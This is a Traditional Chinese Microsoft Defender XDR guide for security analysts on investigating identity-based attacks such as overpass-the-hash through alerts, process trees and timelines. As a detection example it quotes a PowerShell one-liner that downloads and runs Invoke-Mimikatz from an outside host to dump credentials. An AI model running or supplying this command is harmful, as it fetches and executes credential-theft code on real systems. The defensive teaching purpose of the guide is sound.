共用方式為


以身分識別為基礎的攻擊範例

適用於:

  • Microsoft Defender XDR

適用於身分識別的 Microsoft Defender 可協助偵測惡意入侵組織中身分識別的嘗試。 由於適用於身分識別的 Defender 與 Microsoft Defender 全面偵測回應 整合,因此安全性分析師可以看見來自適用於身分識別的 Defender 所傳入的威脅,例如可疑的 Netlogon 許可權提升嘗試。

分析 適用於身分識別的 Microsoft Defender 中的攻擊

Microsoft Defender 全面偵測回應 可讓分析師在事件頁面的 [警示] 索引卷標上,依偵測來源篩選警示。 在下列範例中,偵測來源會篩選 為適用於身分識別的 Defender

在 適用於身分識別的 Microsoft Defender 中篩選偵測來源

選取可疑的 overpass-the-hash 攻擊警示會移至 Microsoft Defender for Cloud Apps 中顯示更詳細信息的頁面。 您可以一律選取 [ 深入瞭解此警示類型 ] 來閱讀攻擊和補救建議 的描述 ,以深入瞭解警示或攻擊。

可疑的 overpass-the-hash 攻擊警示

調查 適用於端點的 Microsoft Defender 中的相同攻擊

或者,分析師可以使用適用於端點的Defender來深入瞭解端點上的活動。 從事件佇列中選取事件,然後選取 [ 警示] 索引卷 標。從這裡,他們也可以識別偵測來源。 標示為 EDR 的偵測來源代表端點偵測和回應,也就是適用於端點的 Defender。 分析師從這裏選取 EDR 偵測到的警示。

適用於端點的 Microsoft Defender 入口網站中的端點偵測和回應

警示頁面會顯示各種相關信息,例如受影響的裝置名稱、使用者名稱、自動調查的狀態,以及警示詳細數據。 警示劇本描述進程樹狀結構的可視化表示。 進程樹狀結構是與警示相關的父進程和子進程的階層式表示法。

適用於端點的 Microsoft Defender 中的警示程式樹狀結構

每個程式都可以展開以檢視更多詳細數據。 分析師可以看到的詳細數據是輸入為惡意腳本、輸出連線 IP 位址和其他實用資訊一部分的實際命令。

適用於端點的 Microsoft Defender 入口網站中的程序詳細數據

藉由選 取 [在時程表中查看],分析師可以進一步向下切入,以判斷入侵的確切時間。

適用於端點的 Microsoft Defender 可以偵測許多惡意檔案和腳本。 不過,由於輸出連線、PowerShell 和命令行活動有許多合法用途,某些活動會被視為良性活動,直到建立惡意檔案或活動為止。 因此,使用時間軸可協助分析師將警示放入周圍活動的內容中,以判斷攻擊的原始來源或時間,否則會被一般文件系統和用戶活動遮蔽。

若要使用時程表,分析師會在警示偵測 (紅色) 時開始,然後往回捲動,以判斷導致惡意活動的原始活動何時實際啟動。

分析師的警示偵測開始時間

請務必瞭解並區分常見的活動,例如 Windows Update 連線、Windows 受信任軟體啟用流量、Microsoft 網站的其他常見連線、第三方因特網活動、Microsoft 端點 Configuration Manager 活動,以及其他良性活動與可疑活動。 其中一種區分方式是使用時程表篩選。 有許多篩選條件可以醒目提示特定活動,同時篩選掉分析師不想要檢視的任何專案。

在下圖中,分析師篩選為僅檢視網路和處理事件。 此篩選準則可讓分析師查看事件周圍的網路連線和程式,其中記事本已建立與IP位址的連線,我們也會在進程樹狀結構中看到。

記事本如何用來建立惡意輸出連線

在此特定事件中,[記事本] 是用來建立惡意的輸出連線。 不過,攻擊者通常會使用 iexplorer.exe 來建立連線以下載惡意承載,因為通常 iexplorer.exe 程式會被視為一般網頁瀏覽器活動。

要在時程表中尋找的另一個專案是用於輸出連線的PowerShell。 分析師會尋找成功的 PowerShell 連線與命令,例如 IEX (New-Object Net.Webclient) ,後面接著裝載惡意檔案之網站的輸出連線。

在下列範例中,PowerShell 是用來從網站下載並執行Mimikatz:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

分析師可以在搜尋列中輸入 關鍵詞,以快速搜尋關鍵詞,只顯示使用 PowerShell 建立的事件。

下一步

請參閱 網路釣魚 調查路徑。

另請參閱

提示

想要深入了解? Engage 技術社群中的 Microsoft 安全性社群:Microsoft Defender 全面偵測回應 技術社群。